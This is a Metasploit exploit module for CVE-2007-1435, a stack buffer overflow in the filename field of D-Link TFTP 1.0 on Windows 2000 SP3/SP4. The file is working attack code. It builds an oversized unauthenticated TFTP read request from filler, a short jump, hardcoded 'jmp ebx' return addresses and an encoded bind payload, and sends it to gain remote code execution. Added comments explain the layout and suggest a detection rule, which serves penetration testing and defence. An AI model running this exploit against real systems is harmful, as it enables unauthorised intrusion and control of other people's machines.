##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2007-1435: a stack buffer overflow in the
  # filename field of D-Link TFTP 1.0 on Windows. A single oversized UDP
  # read-request datagram triggers it. TFTP carries no authentication, so
  # the overflow is reachable unauthenticated; exposure of the service to
  # untrusted networks is the primary risk to mitigate.
  Rank = GoodRanking

  # Supplies connect_udp / udp_sock / disconnect_udp used in #exploit.
  include Msf::Exploit::Remote::Udp

  # Registers module metadata, payload constraints, the two fixed-address
  # targets and the single option (RPORT, defaulting to TFTP's port 69).
  #
  # @param info [Hash] base module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in D-Link TFTP 1.0.
          By sending a request for an overly long file name, an attacker
          could overflow a buffer and execute arbitrary code. For best results,
          use bind payloads with nonx (No NX).
        },
        'Author' => [
          'LSO <lso[at]hushmail.com>', # Exploit module
          'aushack', # Refs, stability, targets etc
        ],
        'References' => [
          [ 'CVE', '2007-1435' ],
          [ 'OSVDB', '33977' ],
          [ 'BID', '22923' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 1024,
          # TFTP's filename field is NUL-terminated (RFC 1350), so a NUL
          # anywhere in the encoded payload would cut the request short.
          'BadChars' => "\x00",
          'Compat' =>
          {
            # Excludes reverse-connection payloads; the description above
            # recommends bind payloads for this target.
            'ConnectionType' => '-reverse',
          },
        },
        # Registers the framework's encoders are asked to preserve. Why these
        # three are needed is not visible here — confirm against the target
        # binary before changing them.
        'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],
        'Platform' => 'win',

        'Targets' => [
          # Patrick tested OK 20090228
          # Fixed, per-service-pack return addresses (pre-ASLR Windows 2000);
          # each points at a `jmp ebx` per the annotations below.
          ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
          ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
        ],
        'Privileged' => false,
        'DisclosureDate' => '2007-03-12',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed;
        # these are the framework's UNKNOWN placeholder constants.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(69) # TFTP's IANA-assigned port
      ], self
    )
  end

  # Sends one malformed TFTP read request and hands off to the payload
  # handler. The datagram is: opcode 0x0001 (RRQ), 581 bytes of filler,
  # a short forward jump, 38 more filler bytes, the target's return
  # address (little-endian), then the encoded payload. No NUL terminator
  # or mode field follows, so it is not a well-formed RRQ; a detection
  # rule keyed on an RRQ whose filename field runs to several hundred
  # bytes without a terminator would flag this traffic.
  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    juju = "\x00\x01" # TFTP opcode 1: read request (RFC 1350)
    juju << Rex::Text.rand_text_alpha_upper(581)
    juju << Rex::Arch::X86.jmp_short(42)
    juju << Rex::Text.rand_text_alpha_upper(38)
    # 'V' packs a 32-bit little-endian value; ret is the per-target address.
    juju << [target.ret].pack('V') + payload.encoded

    udp_sock.put(juju)

    handler
    # NOTE(review): not inside an ensure, so a raise from put/handler skips
    # the disconnect and leaves the socket to the framework's cleanup.
    disconnect_udp
  end
end